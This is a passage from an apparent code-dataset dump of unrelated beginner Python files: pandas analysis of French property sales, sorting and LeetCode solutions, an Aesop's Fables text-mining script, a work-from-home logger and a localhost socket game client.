parcells, This, inf fact should be a dropped field\nby_id_parcells = data_in.groupby('id_parcelle')\n#by_id_parcells.agg({'id_mutation': 'count'}).id_mutation.value_counts()#.plot.bar() #head()\nby_parcell_mutations = by_id_parcells.agg({'id_mutation': 'count'}).reset_index()\n# print(by_parcell_mutations.head())\n\nnuni_ue_mutations_parcels = by_parcell_mutations.loc[\n by_parcell_mutations.id_mutation>1,'id_parcelle'] #filter parcels wit 2 or more mutations\n\nnuni_ue = (data_in.loc[data_in.id_parcelle.isin(nuni_ue_mutations_parcels.values),:]\n .sort_values(by=['id_parcelle']\n )\n )\nnuni_ue.tail(4).T\n\n\n\n#%% \n\n# Drop duplicate properties\nid_ftrs = ['id_parcelle'\n , 'valeur_fonciere'\n ]\ndata_unique = data_in2.drop_duplicates(subset=id_ftrs, keep='last')\n\n\n#%% \ndata_unique.type_local.value_counts()\n\n#%% \n\n# Select only Sell operations\n\ndata = data_unique.loc[ (data_unique.nature_mutation == 'Vente')\n & (data_unique.type_local.isin(['Appartement', 'Maison']))\n ,:]\ndata.shape\n\n\n\n#%% \n# Update usable ftrs categories Nature mutation will be a not usable ftrs\ncat_ftrs.remove('nature_mutation')\nftrs.remove('nature_mutation')\nunuseful_ftrs.append('nature_mutation')\ncat_ftrs.remove('nom_commune')\nftrs.remove('nom_commune')\nunuseful_ftrs.append('nom_commune')\n\n\n#%%\nftrs\n#%%md \n### Explore Target Feature\n###### First Plotting target_value in thousands to facilitate visualization\n\n\n#%%md \n###### Original target values are very left skewed\n\n#%%\n###### Add sale value in thousands for easiest management\n###### Now plot log of target value\ndf_plot = data.sample(10000, random_state=SEED)\n\nfig, ax = plt.subplots(figsize=(12,8))\n(df_plot.valeur_fonciere/1000).plot.hist(ax = ax, bins = 10)\n#sns.histplot(df_plot.valeur_fonciere/1000, ax=ax, kde=False)\nplt.show()\n\n\n\n#%% md\n#Applying log transformations gives a very centered distribution, There is, however a small separated group of very low valuew which can, maybe be inspected to see if they are outliers.\n\n\n#%%\ndata.numero_disposition\n#%%\n# Now plot log of skewed ftrs\n\nfor f in ['valeur_fonciere', 'surface_reelle_bati', 'surface_terrain']:\n df_plot = data.sample(10000, random_state=SEED) \n fig, ax = plt.subplots(figsize=(12,8))\n sns.histplot(np.log1p(df_plot[f].values), ax=ax, kde=True)\n plt.show()\n\n\n\n#%%\n# We add the scaled target value to use\n\ndata['valeur_fonciere_log'] = np.log1p(data['valeur_fonciere'])\n\n# Now plot log of target value\ndf_plot = data.sample(10000, random_state=SEED)\n\nfig, ax = plt.subplots(figsize=(12,8))\nsns.histplot(np.log1p(df_plot.valeur_fonciere_log.values), ax=ax, kde=True)\nplt.show()\n\n#%% md\n#Potentian outlier vals are sell values under 90 and are approx 1% of data\n\n#%%\n\noutlier_thr = np.expm1(4.5)\nprint('Outlier threshold:', outlier_thr)\nprint( data.loc[data['valeur_fonciere_log']<4.5,:].shape\n , data.loc[data['valeur_fonciere'] 0:\n\t\t\t\t\tbreak\n\t\t\tcleaned_venue = ' '.join(cleaned_venue_tokens)\n\t\t\toutputfile.write('#c' + cleaned_venue + '\\n')\n\n\t\t\tyear = re.search(r'(?<=#t ).+', paper).group()\n\t\t\toutputfile.write('#t' + year + '\\n')\n\n\t\t\tabstract = re.search(r'(?<=#! ).+', paper).group()\n\t\t\tabstract = abstract.lower()\n\t\t\tabstract = abstract.translate(remove_digits)\n\t\t\tabstract_tokens = word_tokenize(abstract)\n\t\t\tcleaned_abs_list = []\n\t\t\tfor each in abstract_tokens:\n\t\t\t\tif each not in pw and each not in string.punctuation:\n\t\t\t\t\tcleaned_abs_list.append(each)\n\t\t\tcleaned_abstract = ' '.join(cleaned_abs_list)\n\t\t\toutputfile.write('#!' + cleaned_abstract + '\\n')\n\n\t\t\toutputfile.write('\\n')\n\n\t\toutputfile.close()","sub_path":"scripts/preprocess_topic.py","file_name":"preprocess_topic.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"565776019","text":"import sys\n\n#count the arguments\n#starts at 1\narguments = len(sys.argv) - 1\n\n\nclass Predict:\n def __init__(self, temp, rf, snow, time):\n self.temp = temp\n self.rf = rf\n self.snow = snow\n self.time = time\n\n def closed(self):\n if self.temp <= 31 and self.snow > 2 and self.time > 180:\n print(\"Snow day likely\")\n \n else:\n print(\"Not closing, potenital delayed opening\")\n\n\nprediction = Predict(int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]))\nprediction.closed()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"13414118","text":"\"\"\"\n MergeSort.py 归并排序\n\"\"\"\n\n\ndef merge_sort(_list):\n if len(_list) <= 1:\n return _list\n _mid = len(_list) // 2\n left_list = merge_sort(_list[:_mid])\n right_list = merge_sort(_list[_mid:])\n result = []\n if left_list and right_list:\n while len(left_list) > 0 and len(right_list) > 0:\n result.append(left_list.pop(0)) if left_list[0] <= right_list[0] else result.append(right_list.pop(0))\n result += left_list\n result += right_list\n return result\n\n\nif __name__ == '__main__':\n _l = [1, 2, 3, 4, 222, 3, 4, 6, 99]\n print(merge_sort(_l))\n","sub_path":"MiniModel/Sort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117067855","text":"# On an 8 x 8 chessboard, there is one white rook. There also may be empty squares, white bishops, and black pawns. These are given as characters 'R', '.', 'B', and 'p' respectively. Uppercase characters represent white pieces, and lowercase characters represent black pieces.\n\n# The rook moves as in the rules of Chess: it chooses one of four cardinal directions (north, east, west, and south), then moves in that direction until it chooses to stop, reaches the edge of the board, or captures an opposite colored pawn by moving to the same square it occupies. Also, rooks cannot move into the same square as other friendly bishops.\n\n# Return the number of pawns the rook can capture in one move.\n\n \n\n# Example 1:\n\n\n\n# Input: [[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"R\",\".\",\".\",\".\",\"p\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"]]\n# Output: 3\n# Explanation: \n# In this example the rook is able to capture all the pawns.\n# Example 2:\n\n\n\n# Input: [[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\"p\",\"p\",\"p\",\"p\",\"p\",\".\",\".\"],[\".\",\"p\",\"p\",\"B\",\"p\",\"p\",\".\",\".\"],[\".\",\"p\",\"B\",\"R\",\"B\",\"p\",\".\",\".\"],[\".\",\"p\",\"p\",\"B\",\"p\",\"p\",\".\",\".\"],[\".\",\"p\",\"p\",\"p\",\"p\",\"p\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"]]\n# Output: 0\n# Explanation: \n# Bishops are blocking the rook to capture any pawn.\n# Example 3:\n\n\n\n# Input: [[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\"p\",\"p\",\".\",\"R\",\".\",\"p\",\"B\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"B\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"]]\n# Output: 3\n# Explanation: \n# The rook can capture the pawns at positions b5, d6 and f5.\n \n\n# Note:\n\n# board.length == board[i].length == 8\n# board[i][j] is either 'R', '.', 'B', or 'p'\n# There is exactly one cell with board[i][j] == 'R'\nclass Solution:\n def numRookCaptures(self, board) -> int:\n for i in range(8):\n flag=False\n for j in range(8):\n if board[i][j] == \"R\":\n flag=True\n break\n if flag:\n break\n ni = i + 1\n ans = 0\n while ni < 8:\n if board[ni][j] == \".\":\n ni += 1\n elif board[ni][j] == \"B\":\n break\n else:\n ans += 1\n break\n ni = i - 1\n while ni >= 0:\n if board[ni][j] == \".\":\n ni -= 1\n elif board[ni][j] == \"B\":\n break\n else:\n ans += 1\n break\n nj = j + 1\n while nj < 8:\n if board[i][nj] == \".\":\n nj += 1\n elif board[i][nj] == \"B\":\n break\n else:\n ans += 1\n break\n nj = j - 1\n while nj >= 0:\n if board[i][nj] == \".\":\n nj -= 1\n elif board[i][nj] == \"B\":\n break\n else:\n ans += 1\n break\n return ans","sub_path":"999_Available_Captures_For_Rook.py","file_name":"999_Available_Captures_For_Rook.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"608865091","text":"import urllib.request\nimport string\nimport os\nfrom nltk.corpus import stopwords\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport math\n\nurl = 'http://www.gutenberg.org/cache/epub/28/pg28.txt'\nresponse = urllib.request.urlopen(url)\ndata = response.read() # a `bytes` object\ntext = data.decode('utf-8')\n# os.chdir(r\"c:\\Users\\gdevina1\\Documents\\GitHub\\text_mining\")\n# cwd = os.getcwd()\n# print(cwd)\n#print(text) # for testing\n\ndef process_online_text(text, skip_header):\n \"\"\"\n Makes a histogram that contains the words from a gutenberg online source file.\n\n filename: string\n skip_header: boolean, whether to skip the Gutenberg header\n \n returns: map from each word to the number of times it appears.\n \"\"\"\n hist = {}\n\n if skip_header:\n text = skip_gutenberg_start_end(text)\n\n text = text.split()\n # text = map(toLowerCase,text)\n\n for i in text:\n i = i.replace('-', ' ')\n strippables = string.punctuation + string.whitespace\n\n for word in i.split():\n # remove punctuation and convert to lowercase\n word = word.strip(strippables)\n word = word.lower()\n\n # update the histogram\n hist[word] = hist.get(word, 0) + 1\n\n return hist\n\ndef process_file(filename, skip_header):\n \"\"\"Makes a histogram that contains the words from a local file.\n\n filename: string\n skip_header: boolean, whether to skip the Gutenberg header\n\n returns: map from each word to the number of times it appears.\n \"\"\"\n hist = {}\n fp = open(filename, encoding='utf8')\n\n if skip_header:\n skip_gutenberg_header(fp)\n\n for line in fp:\n strippables = string.punctuation + string.whitespace\n\n for word in line.split():\n # remove punctuation and convert to lowercase\n word = word.strip(strippables)\n word = word.lower()\n\n # update the histogram\n hist[word] = hist.get(word, 0) + 1\n\n return hist\n\ndef skip_gutenberg_start_end(text):\n \"\"\"\n Reads from text until it finds the line that ends the header.\n\n text: open file object\n\n returns: remaining text starting from 'start' and ends with 'end'\n \"\"\"\n start = \"The Man, the Boy, and the Donkey The Fox and the Goat\"\n i = text.find(start)\n end = \"End of the Project Gutenberg EBook of Aesop's Fables, by Aesop\"\n x = text.find(end)\n\n return text[i+(len(start)):x]\n\ndef extract_fable(text,start,end):\n \"\"\"\n Reads from text until it finds the line that ends the header.\n\n text: open file object\n start: string in text\n end: string in text\n\n returns: remaining text starting from 'start' and ends with 'end'\n \"\"\"\n i = text.find(start)\n x = text.find(end)\n\n return text[i+(len(start)):x+(len(end))]\n\ndef compare(hist,animals):\n \"\"\"\n Finds matches of keys in hist and keys in animals, iterates while counting frequency of word appearance.\n\n hist = map from word to frequency\n animals = text file of list of animals\n\n returns = list of frequency,word pairs\n \"\"\"\n match = {}\n for key in animals:\n if key in hist:\n match[key] = hist.get(key, 0)\n return match\n\ndef no_stop_words(hist, key):\n \"\"\"\n Deletes stop words from dictionary\n\n hist = map from word to frequency\n key = elements to delete\n\n returns = list of frequency,word pairs\n \"\"\"\n hist2 = hist.copy()\n for i in key:\n if i in hist2:\n del hist2[i]\n return hist2\n\ndef sentiment_analysis(text):\n score = SentimentIntensityAnalyzer().polarity_scores(text)\n #return the polarity score of the text\n return score\n\ndef most_common(hist):\n \"\"\"Makes a list of word-freq pairs in descending order of frequency.\n\n hist: map from word to frequency\n\n returns: list of (frequency, word) pairs\n \"\"\"\n t = []\n # remove word from filtered_word_list if it is a stop word\n for key, value in hist.items():\n t.append((value, key))\n t.sort()\n t.reverse()\n return t\n\ndef most_common_all(hist):\n \"\"\"\n Prints a list of word-freq pairs in descending order of frequency.\n\n hist: map from word to frequency\n\n prints: list of (frequency, word) pairs\n \"\"\"\n t = []\n for key, value in hist.items():\n t.append((value, key))\n t.sort()\n t.reverse()\n\n for value, key in t:\n print(\"{:14}{}\".format(key, value))\n\n\ndef most_common_limited(hist, num=10):\n \"\"\"\n Prints the most commons words in a histogram and their frequencies.\n\n hist: histogram (map from word to frequency)\n num: number of words to print\n \"\"\"\n t = most_common(hist)\n for freq, word in t[:num]:\n print(\"{:14}{}\".format(word, freq))\n\ndef total_words(hist):\n \"\"\"\n Returns the total of the frequencies in a histogram.\n \"\"\"\n return sum(hist.values())\n\ndef numerator(fable_one, fable_two):\n \"\"\"\n Calculates the numerator of cosine similarity function using \n\n fable_one: histogram\n fable_two: histogram\n \n returns = number\n \"\"\"\n num = 0\n for word in fable_one:\n if word in fable_two:\n num += fable_one[word]*fable_two[word]\n return num\n\ndef cosine_similarity(fable_one, fable_two):\n \"\"\"\n Calculates cosine similarity of two texts (histograms)\n\n fable_one: histogram\n fable_two: histogram\n\n returns = number \n \"\"\"\n num = numerator(fable_one, fable_two)\n denom = math.sqrt(numerator(fable_one,fable_two)*numerator(fable_two,fable_two))\n return math.acos(num/denom)\n\ndef main():\n hist = process_online_text(text,True)\n animals = list(process_file('animals.txt', False).keys())\n animals.remove(animals[0])\n # print(animals)\n # print(compare(hist, animals))\n hist2 = hist.copy()\n # print(hist2)\n # print(no_stop_words(hist2))\n # most_common(hist)\n # print(no_stop_words(hist2,stop_words))\n stop_words = stopwords.words('english')\n print(\"\")\n print(\"The most common words in the text (without stop words) are:\")\n most_common_limited(no_stop_words(hist2,stop_words))\n print(\"\")\n print(\"------------------------------------------------------------\")\n print(\"\")\n print(\"List of all the animals appearing in Aesop's Fables\")\n most_common_all(compare(hist,animals))\n print(\"\")\n print(\"Total number of animals appearing in text: \", total_words(compare(hist,animals)))\n print(\"------------------------------------------------------------\")\n print(\"\")\n print(\"Total number of words in Aesop's Fables collection: \", total_words(hist))\n print(\"Percentage of total words in text that are animals: {0:.2f}%\" .format(total_words(compare(hist,animals))/total_words(hist) *100))\n print(\"\")\n print(\"------------------------------------------------------------\")\n tabcon= extract_fable(text,start=\"1-21 22-42\",end=\"The Fox and the Goat\")\n tableofcontents = process_online_text(tabcon,False)\n # print(tableofcontents)\n print(\"\")\n print(\"The 5 most common animals in the Aesop's Fables' titles:\")\n most_common_limited(compare(tableofcontents,animals),num=5)\n print(\"\")\n print(\"------------------------------------------------------------\")\n print(\"\")\n print(\"The 5 most common animals in the entire text:\")\n most_common_limited(compare(hist,animals),num=5)\n print(\"\")\n print(\"------------------------------------------------------------\")\n hare_and_tortoise = extract_fable(text, start=\"It is easy to propose impossible remedies.\", end=\"Plodding wins the race.\")\n hist_hare_and_tortoise = process_online_text(hare_and_tortoise,False)\n wolf_sheep_clothing = extract_fable(text, start=\"you cannot reckon.\", end=\"Appearances are deceptive.\")\n hist_wolf_sheep_clothing = process_online_text(wolf_sheep_clothing,False)\n fox_and_grapes = extract_fable(text,start=\"Nothing escapes the master's eye.\", end=\"It is easy to despise what you cannot get.\")\n hist_fox_and_grapes = process_online_text(fox_and_grapes,False)\n print(\"\")\n print(\"Sentiment analysis results of The Hare and The Tortoise:\")\n print(sentiment_analysis(hare_and_tortoise))\n print(\"\")\n print(\"Sentiment analysis results of The Wolf in Sheep's Clothing\")\n print(sentiment_analysis(wolf_sheep_clothing))\n print(\"\")\n print(\"Setiment analysis of The Fox and the Grapes\")\n print(sentiment_analysis(fox_and_grapes))\n print(\"\")\n print(\"------------------------------------------------------------\")\n print(\"\")\n print (\"The Hare and The Tortoise and The Wolf in Sheep's Clothing is {:.2f}% similar.\".format(cosine_similarity(hist_hare_and_tortoise,hist_wolf_sheep_clothing)/(math.pi/2)))\n print(\"\")\n print(\"The Hare and The Tortoise and The Fox and the Grapes is {:.2f}% similar.\".format(cosine_similarity(hist_hare_and_tortoise,hist_fox_and_grapes)/(math.pi/2)))\n print(\"\")\n print(\"The Fox and the Grapes and The Wolf in Sheep's Clothing is {:.2f}% similar.\".format(cosine_similarity(hist_wolf_sheep_clothing,hist_fox_and_grapes)/(math.pi/2)))\n print(\"\")\n print(\"------------------------------------------------------------\")\n print(\"END OF ANALYSIS\")\n print(\"------------------------------------------------------------\")\n \n\nif __name__ == '__main__':\n main()","sub_path":"assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"221136914","text":"from array import array as arr\n\n# Bubble Sort\n#a= arr('i',[4,3,5,45,23,76,45,98,76,12,24,33])\n#a= arr('i',[1,2,3,4,5,6,7,8,9,10]) #Best case - zero swaps\na= arr('i',[10,9,8,7,6,5,4,3,2,1]) #worst case - n(n-1)/2 swaps\nprint(\"Bubble Sort\")\nprint(\"array before sorting :\")\nprint(a)\n\ndef swap(a,i,j):\n temp = a[i]\n a[i] = a[j]\n a[j] = temp\n\n\n#total_swaps = 0\n#total_comparisons =0\nfor i in range(0,len(a)):\n #swap = 0\n #comparison = 0\n for j in range(0,len(a)-i-1):\n #comparison+=1\n if(a[j]>a[j+1]):\n swap(a,j,j+1)\n #swap+=1\n #total_swaps = total_swaps + swap\n #total_comparisons = total_comparisons + comparison\n #print(f\"Pass {i} : No. of Comparions={comparison}, No of swaps={swap}\")\n\nprint(a)\n\n\n \n","sub_path":"Searching_Sorting/Bubble_Sort.py","file_name":"Bubble_Sort.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"25397433","text":"#!/usr/bin/env python3\n\"\"\"\n1.创建文件名,如果存在,则换一个名字\n2.创建需要录入的内容\n3.写入文件\n\"\"\"\nimport os\n\ndef getfile():\n while True:\n fname=input(\"请输入文件名:\")\n if os.path.exists(fname):\n print(\"%s已经存在,请重试:\" % fname)\n else:\n break\n return fname\n\ndef getcontent():\n print(\"请输入正文:end表示结束\")\n content=[]\n while True:\n line=input(\">\")\n if line == \"end\":\n break\n content.append(line)\n return content\n\ndef wfile(fname,content):\n with open(fname,'w') as fobj:\n fobj.writelines(content) \n\nif __name__==\"__main__\":\n fname=getfile()\n content=getcontent()\n content=['%s\\n' % line for line in content]\n wfile(fname,content)\n\n\n\n\n","sub_path":"STEP05/project/lianxi/mktxt.py","file_name":"mktxt.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"393724870","text":"from .base_pipeline_builder import BasePipelineBuilder\nfrom .pipeline import Pipeline\nfrom .pipeline_step import PipelineStep\n\n\nclass ExtractorPipelineBuilder(BasePipelineBuilder):\n \"\"\"\"\"\"\n\n def __init__(self):\n \"\"\"\"\"\"\n\n self.post_processors = []\n\n def set_mapping(self, v):\n \"\"\"\"\"\"\n\n self.mapping = v\n return self\n\n def set_extractor(self, v):\n \"\"\"\"\"\"\n\n self.extractor = v\n return self\n\n def add_post_processor(self, v, i=None):\n \"\"\"\"\"\"\n\n if i is None:\n self.post_processors.append(v)\n else:\n self.post_processors.insert(i, v)\n return self\n\n def build(self):\n \"\"\"\"\"\"\n\n self.extractor.mapping = self.mapping\n\n extractor_step = PipelineStep(\n self.extractor.extract\n )\n\n post_processor_steps = [\n PipelineStep(post_processor.process)\n for post_processor in self.post_processors\n ]\n\n steps = [\n extractor_step,\n *post_processor_steps\n ]\n\n return Pipeline(\n steps=steps\n )\n","sub_path":"src/magnesium/pipeline/extractor_pipeline_builder.py","file_name":"extractor_pipeline_builder.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"108316623","text":"import pandas as pd\nimport os\nimport json\n\n \ndef get_details(s):\n a = os.path.basename(s)\n a = a.split('-')\n if a[2].__contains__('.xlsx'):\n a[2] = a[2][:-5]\n return a[0], a[1], a[2] # 0: materia | 1: unidad \\ 2: categoria\n \ndef classify_dataframe(f):\n df = pd.read_excel(f)\n materia, unidad, categ = get_details(f)\n df['Categoria'] = pd.Series([categ]*len(df))\n df['Materia'] = pd.Series([materia]*len(df))\n df['Unidad'] = pd.Series([unidad]*len(df))\n return df\n\ndef get_json_pregs():\n dirname= 'Excels/'\n for root, dirs, files in os.walk(dirname):\n f = files\n \n names = [os.path.join(dirname, filename) for filename in f]\n dfs = [classify_dataframe(name) for name in names]\n \n df = pd.concat(dfs, axis=0)\n \n pr = []\n for i, row in df.iterrows():\n d = {}\n d.update({'Respuestas':row[1:5]})\n d.update({'Preguntas':row['Preguntas']})\n d.update({'Categoria':row['Categoria']})\n d.update({'Materia':row['Materia']})\n d.update({'Unidad':row['Unidad']})\n \n pr = pr + [d]\n \n return json.dumps(pr)\n","sub_path":"noticiados_app/noticiados_app/ex_to_json.py","file_name":"ex_to_json.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361332683","text":"#!/bin/env python3\n\nimport arrow\nimport argparse\nimport io\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--start', help = 'Start date of WFH. ISO8601 date format')\nparser.add_argument('--end', help = 'End date of WFH. ISO8601 date format')\nparser.add_argument('--office', help = 'File containing ISO-8601 dates when present at the office')\n\nargs = parser.parse_args()\n\nstart = arrow.get(args.start)\nend = arrow.get(args.end)\nofficeFile = args.office\n\nholidays = []\noffice = []\n\nif officeFile is not None:\n with open(officeFile, 'r') as at_office:\n file_content = at_office.readlines()\n\n for office_date in file_content:\n office.append(office_date.strip())\n\nwith open('holidays.txt', 'r') as publicHolidays:\n file_content = publicHolidays.readlines()\n\n for current_line in file_content:\n holidays.append(current_line.strip())\n\nwith open('wfh.csv', 'w') as schedule:\n schedule.write('Date, Day, Location\\n')\n\n for current_date in arrow.Arrow.span_range('day', start, end):\n date = current_date[0]\n\n if date.isoweekday() in range(1,6):\n str_date = date.format(\"YYYY-MM-DD\")\n\n if str_date in holidays:\n schedule.write(str_date + \",\" + date.format(\"dddd\") + \",Public Holiday\\n\")\n elif str_date in office:\n schedule.write(str_date + \",\" + date.format(\"dddd\") + \",Working at employers office\\n\")\n else:\n schedule.write(str_date + \",\" + date.format(\"dddd\") + \",Working from home\\n\")\n\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"567737908","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 15 20:17:53 2018\n\n不定數迴圈, break at -9999\n\"\"\"\n\nwhile True:\n y = eval(input(\"Enter a year number: \"))\n if y != -9999:\n if y % 400 == 0 or (y % 4 == 0 and y % 100 != 0):\n print('%d is a leap year.' % (y))\n else:\n print('%d is not a leap year.' % (y))\n else:\n break\n\n\"\"\"\ndef isLeap(y):\n if y % 400 == 0 or (y % 4 == 0 and y % 100 != 0):\n print('%d is a leap year.' % (y))\n else:\n print('%d is not a leap year.' % (y))\n \ndef main():\n while True:\n ye = eval(input(\"Enter a year number: \"))\n if ye != -9999:\n isLeap(ye)\n else:\n break\n \nmain()\n\"\"\" ","sub_path":"textbook/sample-code_s1_s2/s1_loop_3_isLeap.py","file_name":"s1_loop_3_isLeap.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"518828321","text":"\"\"\"\nThis is a simple example of a client program written in Python.\nAgain, this is a very basic example to complement the 'basic_server.c' example.\n\n\nWhen testing, start by initiating a connection with the server by sending the \"init\" message outlined in \nthe specification document. Then, wait for the server to send you a message saying the game has begun. \n\nOnce this message has been read, plan out a couple of turns on paper and hard-code these messages to\nand from the server (i.e. play a few rounds of the 'dice game' where you know what the right and wrong \ndice rolls are). You will be able to edit this trivially later on; it is often easier to debug the code\nif you know exactly what your expected values are. \n\nFrom this, you should be able to bootstrap message-parsing to and from the server whilst making it easy to debug.\nThen, start to add functions in the server code that actually 'run' the game in the background. \n\"\"\"\n\nimport socket\nfrom time import sleep\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect the socket to the port where the server is listening\nserver_address = ('localhost', 4444)\nprint ('connecting to %s port %s' % server_address)\nsock.connect(server_address)\ncount=0\nsleep(30)\nmessage = 'INIT'.encode()\nsock.sendall(message)\nmoves = [\",MOV,EVEN\",\",MOV,EVEN\",\",MOV,CON,1\",\",MOV,ODD\",\",MOV,CON,1\",\",MOV,ODD\",\",MOV,CON,1\",\",MOV,ODD\"]\ni = 0\ntry:\n while True:\n \n exit = False\n # Look for the response\n amount_received = 0\n amount_expected = len(message)\n \n while amount_received < amount_expected:\n data = sock.recv(1024)\n amount_received += len(data)\n mess = data.decode()\n if \"WELCOME\" in mess:\n id = mess.split(\",\")[1]\n if \"START\" in mess:\n print(\"The games have begun\")\n print ( 'received \"%s\"' % mess)\n sock.sendall((str(id) + moves[i]).encode()) # Client has ID 231\n i = i +1\n elif \"ELIM\" in mess:\n print ( 'received \"%s\"' % mess)\n print(\"We lost, closing connection\")\n exit = True\n break\n elif \"PASS\" in mess or \"FAIL\" in mess:\n print ( 'received \"%s\"' % mess)\n sock.sendall((str(id) + moves[i]).encode())\n i = i+1\n print('Sending con message')\n else:\n print ( 'received \"%s\"' % mess)\n if exit:\n break\nfinally: \n print ('closing socket')\n sock.close()\n","sub_path":"socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584874700","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProblem 1:Python code for solving initial value problem using backward integration with Euler's method\nCreated on Wed Apr 1 13:28:50 2020\n\n@author: krishnendu\n\"\"\"\n\nimport numpy as np\nfrom scipy.optimize import *\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import *\n#Problem 1: \ndef fun1(y): #defining the function for derivative \n return -9*y\n\ndef func1(x,y): #defining the function for doing the implicit Euler's method\n return x-y-h1*fun1(x)\n\na1=0 #starting point \nb1=1 #ending point\nN1=100 #number of mesh points\nx1=np.linspace(a1,b1,N1) #creating mesh point\nh1=(b1-a1)/(N1-1) #step size\nw1=np.zeros(N1)\nf1=np.zeros(N1)\nw1[0]=np.exp(1) #putting the initial condition\nf1[0]=np.exp(1 ) #putting the initial condition\nfor i in range(N1-1): #iteration \n f1[i+1]=f1[i]+h1*fun1(w1[i]) #finding the guess value for implicit Euler's method using explicit Euler's method\n \n w1[i+1]=newton(func1,f1[i+1],args=(w1[i],)) #finding the value of y\n\nplt.plot(x1,w1,label=\"Implicit Euler's method\") \nplt.xlabel(\"x\",size=18)\nplt.ylabel(\"y\",size=18)\nplt.title(\"Problem 1-(a)\",size=18)\nplt.legend()\nplt.grid()\nplt.show()\n\n#Problem 2: #defining the function for derivative \n\na2=0 #starting point \nb2=1 #ending point\nN2=100 #number of mesh points\nx2=np.linspace(a2,b2,N2) #creating mesh point\nh2=(b2-a2)/(N2-1) #step size\n\ndef fun2(y,x): #defining the function for derivative \n return -20*(y-x)**2+2*x\n\ndef func2(x,y,z): #defining the function for doing the implicit Euler's method\n return x-y-h2*fun2(x,z)\n\nw2=np.zeros(N2)\nf2=np.zeros(N2)\nw2[0]=1/3 #putting the initial value\nf2[0]=1/3 #putting the initial value\nfor i in range(N2-1): #iteration\n f2[i+1]=f2[i]+h2*fun2(w2[i],x2[i]) #finding the guess value for implicit Euler's method using explicit Euler's method\n \n w2[i+1]=newton(func2,f2[i+1],args=(w2[i],x2[i+1],)) #finding value of y\n \nplt.plot(x2,w2,label=\"Implicit Euler's method\")\nplt.xlabel(\"x\",size=18)\nplt.ylabel(\"y\",size=18)\nplt.title(\"Problem 1-(b)\",size=18)\nplt.legend()\nplt.grid()\nplt.show()","sub_path":"problem_1_assign_2.py","file_name":"problem_1_assign_2.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"213345914","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, prev, next, child):\n self.val = val\n self.prev = prev\n self.next = next\n self.child = child\n\"\"\"\n\nclass Solution(object):\n def flatten(self, head):\n \"\"\"\n :type head: Node\n :rtype: Node\n \"\"\"\n if head == None or (head.next == None and head.child == None):\n return head\n stack = []\n node = head\n tail = None\n while node != None:\n if node.child != None:\n tmp = node.child\n node.child = None\n if node.next != None:\n stack.append(node.next)\n tmp.prev = node\n node.next = tmp\n node = tmp\n else:\n tail = node\n node = node.next\n while len(stack) > 0:\n top = stack.pop()\n tail.next = top\n top.prev = tail\n tail = top\n while top.next != None:\n top = top.next\n tail = top\n return 